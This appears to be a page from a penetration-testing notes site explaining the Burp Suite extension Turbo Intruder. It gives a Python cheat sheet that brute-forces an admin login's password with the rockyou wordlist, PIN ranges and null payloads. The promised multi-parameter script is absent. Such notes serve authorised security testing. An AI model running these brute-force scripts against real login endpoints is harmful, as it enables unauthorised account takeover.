search
The Hacker's Notes
githubEdit

Turbo Intruder in Burp Suite

Turbo Intruder is the Burp Suite extension for brute forcing or fuzzing to websites.

hashtag
Using Single Parameter

Set “%s” to the parameter for brute force. For example, set %s as the value of password then we can brute force to password.

POST /login HTTP/1.1
...

username=admin&password=%s

Here is the Python cheat sheet. We can use either code depending on the situation.

def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                        concurrentConnections=5,
                        requestsPerConnection=5,
                        pipeline=False
                        )

    # Brute force (wordlist)
    for word in open('/usr/share/wordlists/rockyou.txt'):
        engine.queue(target.req, word.rstrip())

    # Brute force (0 - 255)
    for i in range(0, 255):
        engine.queue(target.req, str(i))

    # Brute force (0000 - 9999)
    for word in open('/usr/share/seclists/Fuzzing/4-digits-0000-9999.txt'):
        engine.queue(target.req, word.rstrip())

    # Brute Force (alphabet)
    for word in open('/usr/share/seclists/Fuzzing/char.txt'):
        engine.queue(target.req, word.rstrip())

    # Brute Force (alphanum upper-lower)
    for word in open('/usr/share/seclists/Fuzzing/alphanum-case.txt'):
        engine.queue(target.req, word.rstrip())

    # Null payloads (infinite loop)
    i = 0
    while i < 1:
        engine.queue(target.req, None)

    # Null payloads (100 loops)
    i = 0
    while i < 100:
        engine.queue(target.req, None)
        i += 1


def handleResponse(req, interesting):
    if interesting:
        table.add(req)

hashtag
Using Multiple Parameters

In addition to simple parameter, we can apply multiple parameters e.g. username and password.

Here is the Python script. We need to apply multiple words for each parameter as below.

PreviousSOCKS Proxy in Burp SuiteNextScripting

Last updated